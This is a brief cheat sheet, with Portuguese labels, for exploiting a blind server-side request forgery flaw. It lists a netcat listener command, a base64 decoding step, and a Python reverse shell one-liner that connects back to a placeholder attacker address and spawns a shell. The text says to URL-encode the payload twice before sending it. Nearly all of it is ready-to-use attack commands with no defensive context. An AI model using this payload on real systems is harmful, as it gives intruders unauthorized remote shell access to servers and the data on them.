# Blind SSRF Exploitation Example

| `nc -lvnp 9090`                                  | Iniciando um ouvinte netcat                   |
| ------------------------------------------------ | --------------------------------------------- |
| `echo """<B64 encoded response>""" \| base64 -d` | Decodificando a resposta codificada em base64 |

Carga útil do shell reverso (para ser URL codificado duas vezes)

```
export RHOST="<VPN/TUN IP>";export RPORT="<PORT>";python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
```
